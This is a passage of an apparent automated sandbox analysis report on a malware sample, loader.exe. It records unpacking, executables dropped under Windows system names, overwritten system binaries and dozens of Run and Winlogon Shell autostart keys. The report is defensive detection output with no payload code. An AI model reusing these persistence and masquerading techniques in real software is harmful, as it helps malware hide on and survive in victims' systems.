                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeSection loaded: rsaenh.dll
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeSection loaded: cryptbase.dll
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeSection loaded: version.dll
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeSection loaded: wldp.dll
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeSection loaded: profapi.dll
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeSection loaded: sspicli.dll
                                    Source: C:\Recovery\conhost.exeSection loaded: mscoree.dll
                                    Source: C:\Recovery\conhost.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Recovery\conhost.exeSection loaded: version.dll
                                    Source: C:\Recovery\conhost.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Recovery\conhost.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Recovery\conhost.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Recovery\conhost.exeSection loaded: uxtheme.dll
                                    Source: C:\Recovery\conhost.exeSection loaded: windows.storage.dll
                                    Source: C:\Recovery\conhost.exeSection loaded: wldp.dll
                                    Source: C:\Recovery\conhost.exeSection loaded: profapi.dll
                                    Source: C:\Recovery\conhost.exeSection loaded: cryptsp.dll
                                    Source: C:\Recovery\conhost.exeSection loaded: rsaenh.dll
                                    Source: C:\Recovery\conhost.exeSection loaded: cryptbase.dll
                                    Source: C:\Recovery\conhost.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeSection loaded: version.dll
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeSection loaded: wldp.dll
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeSection loaded: profapi.dll
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeSection loaded: sspicli.dll
                                    Source: C:\Users\user\Desktop\loader.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                                    Source: Window RecorderWindow detected: More than 3 window changes detected
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                                    Source: loader.exeStatic file information: File size 3314471 > 1048576
                                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: loader.exe, loader.exe, 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp
                                    Source: Binary string: :C:\Users\user\AppData\Local\Temp\xiz5tqzr\xiz5tqzr.pdb source: chainPorthostCommon.exe, 00000005.00000002.2352626856.000000000319A000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: :C:\Users\user\AppData\Local\Temp\d135vvi0\d135vvi0.pdb source: chainPorthostCommon.exe, 00000005.00000002.2352626856.000000000319A000.00000004.00000800.00020000.00000000.sdmp

                                    Data Obfuscation

                                    barindex
                                    Detected unpacking (changes PE section rights)
                                    Source: C:\Users\user\Desktop\loader.exeUnpacked PE file: 0.2.loader.exe.630000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;Unknown_Section5:EW;.rsrc:EW;Unknown_Section7:EW;cheat:EW; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:W;Unknown_Section4:R;Unknown_Section5:R;.rsrc:EW;Unknown_Section7:EW;cheat:EW;
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xiz5tqzr\xiz5tqzr.cmdline"
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\d135vvi0\d135vvi0.cmdline"
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xiz5tqzr\xiz5tqzr.cmdline"Jump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\d135vvi0\d135vvi0.cmdline"Jump to behavior
                                    Source: C:\Users\user\Desktop\loader.exeFile created: C:\ServerWinRuntimeBroker\__tmp_rar_sfx_access_check_5798765Jump to behavior
                                    Source: loader.exeStatic PE information: section name:
                                    Source: loader.exeStatic PE information: section name:
                                    Source: loader.exeStatic PE information: section name:
                                    Source: loader.exeStatic PE information: section name:
                                    Source: loader.exeStatic PE information: section name:
                                    Source: loader.exeStatic PE information: section name:
                                    Source: loader.exeStatic PE information: section name:
                                    Source: loader.exeStatic PE information: section name: cheat
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_006681CD push esi; ret 0_2_006681D6
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_0064F640 push ecx; ret 0_2_0064F653
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_0064EB78 push eax; ret 0_2_0064EB96
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_006DC104 push ecx; mov dword ptr [esp], edx0_2_006DC109
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_006DC32C push ecx; mov dword ptr [esp], edx0_2_006DC331
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_006C83EA push 006C8418h; ret 0_2_006C8410
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_006D93A0 push 006D9400h; ret 0_2_006D93F8
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_006DC448 push ecx; mov dword ptr [esp], edx0_2_006DC44D
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_006C845C push 006C8488h; ret 0_2_006C8480
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_006DA454 push 006DA4A1h; ret 0_2_006DA499
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_006C8424 push 006C8450h; ret 0_2_006C8448
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_006D0424 push 006D06D8h; ret 0_2_006D06D0
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_006C84F8 push 006C852Ch; ret 0_2_006C8524
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_006DC48C push ecx; mov dword ptr [esp], edx0_2_006DC491
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_006C8494 push 006C84C0h; ret 0_2_006C84B8
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_006DE54C push ecx; mov dword ptr [esp], edx0_2_006DE54D
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_006D9548 push 006D95A4h; ret 0_2_006D959C
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_006D8536 push 006D85B5h; ret 0_2_006D85AD
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_006C65F0 push 006C6641h; ret 0_2_006C6639
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_006D762C push 006D76A2h; ret 0_2_006D769A
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_006D06DA push 006D074Bh; ret 0_2_006D0743
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_006D76A4 push 006D774Ch; ret 0_2_006D7744
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_006D9684 push ecx; mov dword ptr [esp], ecx0_2_006D9687
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_006D774E push 006D779Ch; ret 0_2_006D7794
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_006C8738 push 006C885Ch; ret 0_2_006C8854
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_006D085E push 006D088Ch; ret 0_2_006D0884
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_006D8804 push 006D8830h; ret 0_2_006D8828
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_006D98F4 push ecx; mov dword ptr [esp], ecx0_2_006D98F6
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_006C68AA push 006C68D8h; ret 0_2_006C68D0
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_006C6968 push 006C6994h; ret 0_2_006C698C
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_006C7A48 push ecx; mov dword ptr [esp], eax0_2_006C7A49
                                    Source: loader.exeStatic PE information: section name: entropy: 7.9966173970846315
                                    Source: loader.exeStatic PE information: section name: entropy: 7.980672042041817
                                    Source: loader.exeStatic PE information: section name: entropy: 7.4680767408434345
                                    Source: loader.exeStatic PE information: section name: entropy: 7.940310001309214
                                    Source: loader.exeStatic PE information: section name: entropy: 7.847280090655699
                                    Source: loader.exeStatic PE information: section name: .rsrc entropy: 7.86163703105012
                                    Source: loader.exeStatic PE information: section name: cheat entropy: 7.983850693923614
                                    Source: chainPorthostCommon.exe.0.drStatic PE information: section name: .text entropy: 7.553017199848596
                                    Source: tQESKTdysPpsVzUyXTE.exe.5.drStatic PE information: section name: .text entropy: 7.553017199848596
                                    Source: conhost.exe.5.drStatic PE information: section name: .text entropy: 7.553017199848596
                                    Source: dasHost.exe.5.drStatic PE information: section name: .text entropy: 7.553017199848596
                                    Source: csrss.exe.5.drStatic PE information: section name: .text entropy: 7.553017199848596
                                    Source: RuntimeBroker.exe.5.drStatic PE information: section name: .text entropy: 7.553017199848596

                                    Persistence and Installation Behavior

                                    barindex
                                    Drops PE files with benign system names
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeFile created: C:\Program Files (x86)\Microsoft\csrss.exeJump to dropped file
                                    Drops executables to the windows directory (C:\Windows) and starts them
                                    Source: C:\Windows\System32\cmd.exeExecutable created and started: C:\Windows\LiveKernelReports\RuntimeBroker.exeJump to behavior
                                    Source: unknownExecutable created and started: C:\Windows\DiagTrack\Scenarios\dasHost.exe
                                    Source: unknownExecutable created and started: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exe
                                    Infects executable files (exe, dll, sys, html)
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeFile created: C:\Recovery\conhost.exeJump to dropped file
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeFile created: C:\Users\user\Desktop\ZPhRdffT.logJump to dropped file
                                    Source: C:\Users\user\Desktop\loader.exeFile created: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeJump to dropped file
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile created: C:\Users\user\Desktop\PHEbWhMM.logJump to dropped file
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeFile created: C:\Program Files (x86)\Microsoft\csrss.exeJump to dropped file
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeFile created: C:\Users\user\Desktop\SSuSBQke.logJump to dropped file
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeFile created: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeJump to dropped file
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeFile created: C:\Windows\LiveKernelReports\RuntimeBroker.exeJump to dropped file
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile created: C:\Users\user\Desktop\OTzTkTQO.logJump to dropped file
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile created: C:\Users\user\Desktop\pOvooSqL.logJump to dropped file
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeFile created: C:\Users\user\Desktop\BLdnhdFQ.logJump to dropped file
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to dropped file
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeFile created: C:\Users\user\Desktop\kmFpzVgz.logJump to dropped file
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile created: C:\Users\user\Desktop\JgiUHXBa.logJump to dropped file
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile created: C:\Users\user\Desktop\XCTiUwVw.logJump to dropped file
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeFile created: C:\Users\user\Desktop\keVXUmFt.logJump to dropped file
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeFile created: C:\Windows\DiagTrack\Scenarios\dasHost.exeJump to dropped file
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeFile created: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeJump to dropped file
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeFile created: C:\Windows\LiveKernelReports\RuntimeBroker.exeJump to dropped file
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeFile created: C:\Windows\DiagTrack\Scenarios\dasHost.exeJump to dropped file
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeFile created: C:\Users\user\Desktop\kmFpzVgz.logJump to dropped file
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeFile created: C:\Users\user\Desktop\keVXUmFt.logJump to dropped file
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeFile created: C:\Users\user\Desktop\SSuSBQke.logJump to dropped file
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeFile created: C:\Users\user\Desktop\BLdnhdFQ.logJump to dropped file
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeFile created: C:\Users\user\Desktop\ZPhRdffT.logJump to dropped file
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile created: C:\Users\user\Desktop\PHEbWhMM.logJump to dropped file
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile created: C:\Users\user\Desktop\JgiUHXBa.logJump to dropped file
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile created: C:\Users\user\Desktop\pOvooSqL.logJump to dropped file
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile created: C:\Users\user\Desktop\XCTiUwVw.logJump to dropped file
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile created: C:\Users\user\Desktop\OTzTkTQO.logJump to dropped file

                                    Boot Survival

                                    barindex
                                    Creates an autostart registry key pointing to binary in C:\Windows
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBrokerJump to behavior
                                    Creates an undocumented autostart registry key
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                    Creates multiple autostart registry keys
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run tQESKTdysPpsVzUyXTEJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBrokerJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run chainPorthostCommonJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run csrssJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dasHostJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run conhostJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBrokerJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBrokerJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBrokerJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBrokerJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run csrssJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run csrssJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run csrssJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run csrssJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dasHostJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dasHostJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dasHostJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dasHostJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run conhostJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run conhostJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run conhostJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run conhostJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run tQESKTdysPpsVzUyXTEJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run tQESKTdysPpsVzUyXTEJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run chainPorthostCommonJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run chainPorthostCommonJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run chainPorthostCommonJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run chainPorthostCommonJump to behavior
                                    Source: C:\Users\user\Desktop\loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
